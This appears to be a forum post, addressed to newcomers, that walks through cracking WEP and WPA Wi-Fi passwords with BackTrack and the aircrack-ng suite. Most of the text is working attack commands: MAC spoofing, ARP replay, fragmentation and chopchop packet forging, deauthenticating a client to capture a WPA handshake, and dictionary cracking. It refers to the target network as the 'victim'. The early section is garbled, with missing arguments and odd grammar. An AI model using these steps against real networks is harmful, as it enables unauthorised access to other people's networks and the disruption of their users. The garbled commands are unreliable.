WEP cracking in a nutshell (NEWCOMERS PLEASE READ)

WEP cracking in a nutshell (NEWCOMERS PLEASE READ)

It found that some of the commands differ from backtrack 2 to backtrack3 (slightly)
either way heres a step by step
once you have the backtrack iso cd in the tray and your network adapter plugged into the usb (it use a network adapter)
boot up your computer.
next to the k that resembles start menu in windows there should be a little black window click on it and it pulls up whats called terminal (simmilar to dos for windows)
now itll go into what to type in the terminals, it usually have about 4 of these windows open and it will identify which window you type in by writing "t1,t2, t3, etc" before each instruction
where it type <> you insert information where it type [enter] you hit enter
youll get it as we go along

also when you see your victims bssid you will want to copy it and then paste it where needed being that a bssid is pretty long. for those who hate using the mouse and use hotkeys the paste function is shift+insert for linux

t1:
type: airmon-ng stop ath0 (this will let you see the devices your using ex: rausb0) [enter]
ifconfig [enter] <-- it dont remember if this enter goes here you can try it with or without, see which works
macchanger --mac 00:11:22:33:44:55 (this changes your mac address in order to cause some confusion) [enter]
airmon-ng start [enter]

t2: airodump-ng (scans the network for available wireless networks, press ctrl+c to pause) [enter]
airodump-ng -c -w --bssid [enter]
(let this window run throughout the entire crack)
basically what you just did in t2 was scan the available networks and then say to your computer ok well were gonna make a catch file in this location (this is where i said name a catch file) and were gonna read packets of information in this location (what your doing to crack the wep encryption is send information (packets) to whatever network you want to crack and that network is sending information back, the files we want are not neccessarily the packets but the arp's, thats what aircrack actually analyzes in order to crack the wep)

t3:
aireplay-ng -1 0 -a -h 00:11:22:33:44:55 [enter]
aireplay-ng -3 -b -h 00:11:22:33:44:55 [enter]

t4:
aircrack-ng -n 64 --bssid -01.cap

for the catch file part...lets say it named my catch file "hack" it would type in hack-01.cap


and thats it you should have your wep passphrase

also a little something it noticed, though not true for all networks its true for many networks around my way....
it noticed the bssid is often the same as the passphrase, so just MAYBE you would want to try the bssid before doing the rest of the hack

WEP Crack Basics:
bt ~ # iwconfig (check wireless card name - we will assume ath0)
bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start ath0
bt ~ # airodump-ng -w capture -c 1 ath0 (writes to file "capture" on channel 1, as specified)
New terminal (leave other one open)
bt ~ # macchanger ath0 (not down MAC address)
bt ~ # aireplay-ng -1 0 -e NETWORK -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0 (where the AA:BB:etc. is the access point's MAC address, also seen as the BSSID in the first terminal [airodump] window, and the second GG:HH:etc. is your own MAC address as seen in the macchanger window)

Section for when clients are attached to the network:
bt ~ # aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0

Section for when no clients attached:
Method 1-
bt ~ # aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0
Answer y for yes when prompted. Note down to two names of files - the fragment-xxx-xxxxxx.xor file, and the replay_src-xxx-xxxxxx.cap file)
bt ~ # packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w replay_src-xxxx-xxxxxx.cap
bt ~ # aireplay-ng -2 -r replay_src-xxxx-xxxxxx.cap ath0

Method 2-
bt ~ # aireplay-ng -4 -h GG:HH:II:JJ:KK:LL -b AA:BB:CC:DD:EE:FF ath0
Answer y for yes when prompted. Note down to two names of files - the fragment-xxx-xxxxxx.xor file, and the replay_src-xxx-xxxxxx.cap file)
bt ~ # packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w replay_src-xxxx-xxxxxx.cap
bt ~ # aireplay-ng -2 -r replay_src-xxxx-xxxxxx.cap ath0


Cracking the key:
bt ~ # aircrack-ng (-z) capture*.cap (the -z is in brackets because it can be used if you have captured ARP requests, and is faster - so try this first, but if it doens't work - remove it) (the capture*.cap is just using the file that you captured to - this can be run whilst capturing)




WPA Cracking:
bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start ath0
bt ~ # airodump-ng -w wpa -c 1 ath0
New Terminal:
bt ~ # aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c MM:NN:OO:PP:QQ:RR ath0 (where the MM:NN:etc. is a client's MAC address - this forces them to disconnect, giving us the "handshake" that we want, which contains the password, otherwise you just have to wait for a client to connect)
bt ~ # aircrack-ng -w dictionary.lst wpa*.cap (dictionary.lst is a dictionary/wordfile, as WPA has to be cracked with one of these. wpa*.cap is the capture file)